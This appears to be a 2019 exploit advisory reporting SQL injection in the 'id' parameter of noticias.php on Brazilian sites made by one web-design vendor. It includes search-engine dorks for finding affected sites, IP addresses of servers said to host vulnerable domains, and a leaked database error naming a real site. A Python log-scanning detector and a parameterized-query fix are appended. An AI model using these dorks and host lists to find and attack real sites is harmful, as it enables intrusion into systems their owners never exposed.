KingSkrupellos

Criação sitesrapidos.com.br Web Design Brazil SQL Injection

Jan 16th, 2019
##############################################################

# Exploit Title : Criação sitesrapidos.com.br Web Design Brazil SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 16/01/2019
# Vendor Homepage : sitesrapidos.com.br
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''criação: sitesrapidos.com.br''
criação: sitesrapidos.com.br inurl:/noticias.php?id=
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

##############################################################

# SQL Injection Exploit :
***********************
/noticias.php?id=[SQL Injection]

##############################################################

# Example Vulnerable Sites :
*************************

Note : (63.247.92.74) => There are 31 domains hosted on this server.

Note : (192.185.170.138) => There are 159 domains hosted on this server.

Note : (187.45.193.229) => There are 549 domains hosted on this server.

Note : (187.45.210.66) => There are 95 domains hosted on this server.

Note : (192.185.170.14) => There are 60 domains hosted on this server.

Note : (192.185.31.71) => There are 194 domains hosted on this server.

##############################################################

# SQL Database Error :
**********************

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/httpd/vhosts/sanderagropecuaria.com.br/httpdocs/noticias.php on line 42

##############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

##############################################################
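
Detection logic for the pattern this advisory describes, added here as an example and not part of the original paste: it scans web-server access logs for requests to `/noticias.php` whose `id` value is not a plain integer. The combined log format, the function name `suspicious_id_requests` and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Matches the client address and request line of a combined-format log entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" \d{3}'
)

def suspicious_id_requests(log_lines, script="/noticias.php", param="id"):
    """Return (ip, raw_target, decoded_value) for each request to `script`
    whose `param` value is anything other than a short run of ASCII digits."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith(script):
            continue
        # parse_qs percent-decodes values, so an encoded quote becomes "'".
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        for value in values:
            if not re.fullmatch(r"[0-9]{1,10}", value):
                hits.append((m.group("ip"), m.group("target"), value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.10 - - [16/Jan/2019:10:00:01 -0300] "GET /noticias.php?id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/Jan/2019:10:00:05 -0300] "GET /noticias.php?id=3%27 HTTP/1.1" 200 812',
    '198.51.100.7 - - [16/Jan/2019:10:00:09 -0300] "GET /contato.php?id=abc HTTP/1.1" 200 900',
    '203.0.113.44 - - [16/Jan/2019:10:01:00 -0300] "GET /noticias.php?id= HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for ip, target, value in suspicious_id_requests(SAMPLE_LOG):
        print(f"{ip} sent non-numeric id {value!r} in {target}")
```

The same integer-only rule is the server-side fix: cast or validate `id` as an integer and bind it through a parameterized query before it reaches the database.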